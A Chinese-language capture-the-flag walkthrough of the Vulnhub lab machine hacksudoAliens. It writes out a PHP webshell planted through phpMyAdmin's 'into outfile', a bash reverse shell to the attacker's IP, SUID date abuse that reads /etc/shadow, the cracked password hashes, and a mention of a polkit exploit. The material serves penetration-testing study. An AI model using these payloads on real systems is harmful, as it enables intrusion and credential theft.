Vulnhub靶机：hacksudoAliens

一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.15）

靶机：hacksudoAliens（10.0.2.46）

目标：获取靶机root权限和flag

靶机下载地址：https://download.vulnhub.com/hacksudo/HacksudoAliens.zip

二、信息收集

使用nmap主机发现靶机ip：10.0.2.46

在这里插入图片描述

使用nmap端口扫描发现，靶机开放端口：22、80、9000

在这里插入图片描述

80端口：打开网站未发现可利用的功能点，查看源码也没有发现隐藏信息

在这里插入图片描述

直接使用gobuster工具进行目录爆破

gobuster dir -u http://10.0.2.46 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

查看爆破出来的目录，发现在backup目录下存在mysql数据库备份文件

在这里插入图片描述

查看备份文件发现一组用户名密码

Database credentials

user=“vishal”
password=“hacksudo”
host=“localhost”

在这里插入图片描述

尝试使用用户名密码登录ssh，失败

在这里插入图片描述

9000端口：打开网站发现是phpMyAdmin控制台登录页面，直接使用备份文件发现的用户名密码登录，登陆成功

在这里插入图片描述

查看数据库，发现hacksudo库，但该数据库为空

在这里插入图片描述

在mysql->user表发现5个用户名和加密的密码

在这里插入图片描述

使用在线md5解密网站解密，可以尝试使用这些用户名密码登录ssh

shovon:123
hacksudo:123
root:hacksudo
phpmyadmin:root

经过尝试均失败

三、漏洞利用

可以尝试通过phpMyadmin后台获取shell

前提条件：

1）知道网站真实路径。如果不知道网站真实路径则后续无法通过URL的方式连shell，我们可以使用linux的默认网站路径尝试

2）读写权限。查询secure_file_priv参数，查看是否具有读写文件权限，若为NULL则没有办法写入shell

首先查询secure_file_priv，如果secure_file_priv为空，则不限制导入导出

show variables like "%secure%";

在这里插入图片描述

在SQL执行select '<?php eval($_POST[1]); ?>' into outfile '/var/www/html/shell.php';插入一句话木马

在这里插入图片描述

在浏览器尝试访问一句话木马，看看是否写入成功

在这里插入图片描述

直接使用蚁剑连接一句话木马

在这里插入图片描述

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

查看当前用户是否具有特权命令，或有可利用的具有root权限的二进制文件，发现/usr/bin/date和/usr/lib/policykit-1/polkit-agent-helper-1文件

sudo -l
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

我们可以利用date文件读取root用户的文件，具体利用方法可以通过date | GTFOBins网站查找；polkit-agent-helper-1文件，该版本的polkit存在提权漏洞CVE-2021-4034，靶机没有gcc环境我们可以上传编译好的exp进行提权。

本次提权我们使用date文件进行利用

在这里插入图片描述

使用date读取/etc/shadow文件，获取所有用户密码hash

LFILE=/etc/shadow
/usr/bin/date -f $LFILE

在这里插入图片描述

通过筛选，我们得到两个用户的密码hash值

root: $6$ N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::
hacksudo: $6$ cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::

将密码复制到passwd.txt文件，使用john工具进行爆破，爆破得到一组用户名密码：hacksudo:aliens

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

在这里插入图片描述

使用爆破得到的用户名密码登录ssh

在这里插入图片描述

hacksudo用户没有发现特权命令

在这里插入图片描述

可以翻一翻靶机上的各个文件，发现.bash_history文件执行了一些奇怪的命令

cat .bash_history

在这里插入图片描述

我们可以尝试执行看看，发现直接获取root权限

在这里插入图片描述

获取flag

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/374710.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！